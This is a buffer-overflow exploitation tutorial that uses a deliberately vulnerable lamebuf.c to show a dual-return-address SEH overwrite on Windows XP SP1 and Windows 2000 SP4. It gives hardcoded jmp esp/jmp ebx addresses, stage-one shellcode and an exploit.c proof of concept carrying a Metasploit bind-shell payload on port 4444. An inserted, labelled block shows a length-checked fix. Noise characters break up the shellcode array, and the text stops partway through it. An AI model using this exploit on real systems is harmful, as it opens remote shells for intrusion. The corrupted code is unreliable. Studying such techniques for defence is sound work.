The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every Windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address; in this case we will continue overwriting the stack and overwrite the default exception handler as well.
[Buf]                 <- Shellcode
[Return Address]      <- jmp register (for Windows XP SP1)
[Various Stack Data]  <- Junk
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" (jump 6 bytes forward)
[SE Handler]          <- jmp register (for Win2k SP4)
[Stage1 Shellcode]    <- stage1 shellcode for Win2k
If the first return address (Windows XP SP1) is wrong, an exception will occur and the default exception handler, which now holds the second address (Windows 2000 SP4), will be called. This lets us build a stable exploit that carries two return addresses.
Necessary Tools:
- OllyDBG
- C/C++ Compiler
- nasm
- Sac
Vulnerable Code:
// lamebuf.c
#include <stdio.h>
#include <string.h>
#include <windows.h>

int main(int argc, char *argv[]) {
    char buf[512];
    char buf1[1024]; // <- simulate a stack
    //DebugBreak();
    if (argc != 2) { return -1; }
    strcpy(buf, argv[1]); // unbounded copy: an argument longer than 512 bytes overflows buf
    return 0x0;
}
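For comparison, the same program with the unbounded strcpy() replaced by a length-checked copy, so that an argument longer than the 512-byte buffer is rejected instead of running over the return address and the SEH chain above it. This is an added example, not code from the original post; bounded_copy(), handle_arg() and run_with_arg_len() are names chosen here, and the 'A'-filled test argument is constructed.

```c
// Added example (not from the original post): lamebuf.c with a bounded copy.
// bounded_copy(), handle_arg() and run_with_arg_len() are names chosen here.
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512

/* Copy src into dst (capacity dstsz) only if it fits, NUL included.
   Returns 0 on success, -1 if src is too long; dst is untouched on failure. */
int bounded_copy(char *dst, size_t dstsz, const char *src) {
    size_t len = strlen(src);
    if (dstsz == 0 || len >= dstsz) {
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

/* Same contract as main() in lamebuf.c: -1 for a bad argument count,
   and now also -1 for an oversized argument; 0 otherwise. */
int handle_arg(int argc, char *argv[]) {
    char buf[BUF_SIZE];
    if (argc != 2) {
        return -1;
    }
    if (bounded_copy(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return -1;
    }
    printf("copied %zu bytes\n", strlen(buf));
    return 0;
}

/* Constructed input: a run of arglen 'A' bytes, the byte the writeup uses to
   overflow lamebuf.c. Returns what handle_arg() returns for that argument. */
int run_with_arg_len(size_t arglen) {
    static char arg[2048];
    char *argv[2] = { "lamebuf", arg };
    if (arglen >= sizeof arg) {
        return -1;
    }
    memset(arg, 'A', arglen);
    arg[arglen] = '\0';
    return handle_arg(2, argv);
}

int main(int argc, char *argv[]) {
    return handle_arg(argc, argv);
}
```

The 1600-byte argument used to crash lamebuf.c is refused by this version; anything up to 511 bytes (leaving room for the terminating NUL) is still copied.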
Getting Started:
Before writing the exploit, let's see what happens when we overflow this application with 1600 bytes. The application crashed with the following register state:
EAX 00000000
ECX 00321404
EDX 00414141
EBX 7FFDF000
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 77D4595F
EDI 77F59037 ntdll.77F59037
EIP 41414141
Let's take a look at the stack and see what happened to the default exception handler:

0x0012FFB0 41414141 Pointer to next SEH Record
0x0012FFB4 41414141 SE Handler

We successfully overwrote both the return address and the default exception handler.
Primary Return Address (Windows XP SP1 EN):
The first return address will be called as in a normal stack overflow. We can see that ESP points to user input, so we will use that as our first-stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 EN), and our first-stage shellcode will be:
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"

Secondary Return Address (Windows 2000 SP4 EN):
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k SP4 EN), and our first-stage shellcode will be:
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"
" r% i7 f3 t. [/ \: o' E7 b) d
Proof Of Concept:

// exploit.c
// Tal Zeltzer - [Double Return] //
#include <stdio.h>
#include <string.h>
#include <windows.h>

#define RET_XP    0x77F8AC16 // WinXP Sp1 English - jmp esp
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

// Stage1 For WinXP Sp1 English
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

// Stage1 For Win2k Sp4 English
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85" ( M C- F* \+ C( s+ w1 `5 T5 _ N7 ["\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19" X J# m2 N6 ?" F7 B"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05" - q7 ]0 X" l" v3 c0 p$ {1 E"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"! g% n& V4 d# u5 z1 ^" N
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74" ! Q1 m; f4 P- y"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15" 3 k g- y- y9 s+ i" S"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"/ M: T R. Q7 K3 ^4 k! d6 @
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"% \7 ?* @% ^0 {4 O. I, }2 p
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce" - H, x3 D. Q3 z; Q"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"3 i6 @0 t) C, }* c* k( k
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb" : n0 k: ]3 g9 [" s$ l8 d m( `"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18" , M4 O3 l6 q! E) i% }: N% p"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6" * Q* A! d* f* d' f+ s"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"5 k6 @* r: s8 T( E+ j
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f" 1 q9 J2 u/ @. f: K"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c". L% k; e+ t" ]# M
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18" 9 X" c+ B P6 L8 g! @"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f" 5 T# l P0 J( H8 R% T9 m3 p) n2 C' Y"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"0 ]' g% R8 x0 _( O/ J$ Y% Q
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"# N7 d/ |7 A! t6 S' x) m
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f". h. O# @5 ^1 G2 u& t9 B3 [8 n
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"6 _2 ^1 d4 Y3 _1 L
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2" 8 X; x7 ^9 ?0 u; k! S"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a" 8 H* L# Z/ z0 q5 \ e"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98"; 6 j6 Z6 A5 k5 \. m s" B: ^1 C5 q8 v- P9 w